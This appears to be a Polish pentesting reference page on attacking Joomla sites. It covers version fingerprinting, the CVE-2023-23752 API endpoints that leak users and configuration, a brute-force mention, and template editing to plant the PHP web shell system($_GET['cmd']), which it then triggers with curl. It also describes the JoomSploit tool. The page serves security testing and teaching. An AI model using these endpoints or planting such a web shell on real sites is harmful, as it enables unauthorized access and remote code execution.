Joomla
Statystyki Joomla
Joomla zbiera anonimowe statystyki użycia, takie jak podział wersji Joomla, PHP oraz wersji baz danych i systemów operacyjnych serwerów używanych w instalacjach Joomla. Te dane można zapytać za pośrednictwem ich publicznego API.
Enumeration
Discovery/Footprinting
Sprawdź meta
robots.txt
README.txt
Wersja
W /administrator/manifests/files/joomla.xml możesz zobaczyć wersję.
W /language/en-GB/en-GB.xml możesz uzyskać wersję Joomla.
W plugins/system/cache/cache.xml możesz zobaczyć przybliżoną wersję.
Automatyczny
In 80,443 - Metodologia Pentestingu Web to sekcja o skanerach CMS które mogą skanować Joomla.
Ujawnienie informacji bez uwierzytelnienia API:
Wersje od 4.0.0 do 4.2.7 są podatne na ujawnienie informacji bez uwierzytelnienia (CVE-2023-23752), które ujawnia dane uwierzytelniające i inne informacje.
Użytkownicy:
http://<host>/api/v1/users?public=true
Plik konfiguracyjny:
http://<host>/api/index.php/v1/config/application?public=true
Moduł MSF: scanner/http/joomla_api_improper_access_checks
lub skrypt ruby: 51334
Atak Brute-Force
Możesz użyć tego skryptu aby spróbować przeprowadzić atak brute force na logowanie.
RCE
Jeśli udało ci się zdobyć dane logowania administratora, możesz uzyskać RCE w jego obrębie, dodając fragment kod PHP, aby uzyskać RCE. Możemy to zrobić, dostosowując szablon.
Kliknij na
Templates
w lewym dolnym rogu podConfiguration
, aby otworzyć menu szablonów.Kliknij na nazwę szablonu. Wybierzmy
protostar
w nagłówku kolumnyTemplate
. To przeniesie nas na stronęTemplates: Customise
.Na koniec możesz kliknąć na stronę, aby otworzyć źródło strony. Wybierzmy stronę
error.php
. Dodamy PHP one-liner, aby uzyskać wykonanie kodu w następujący sposób:system($_GET['cmd']);
Zapisz i zamknij
curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id
Od XSS do RCE
JoomSploit: Skrypt do eksploatacji Joomla, który podnosi XSS do RCE lub inne krytyczne luki. Więcej informacji znajdziesz w tym poście. Oferuje wsparcie dla wersji Joomla 5.X.X, 4.X.X i 3.X.X oraz pozwala na:
Podniesienie uprawnień: Tworzy użytkownika w Joomla.
(RCE) Edycja wbudowanych szablonów: Edytuje wbudowane szablony w Joomla.
(Custom) Niestandardowe exploity: Niestandardowe exploity dla wtyczek Joomla innych firm.
Last updated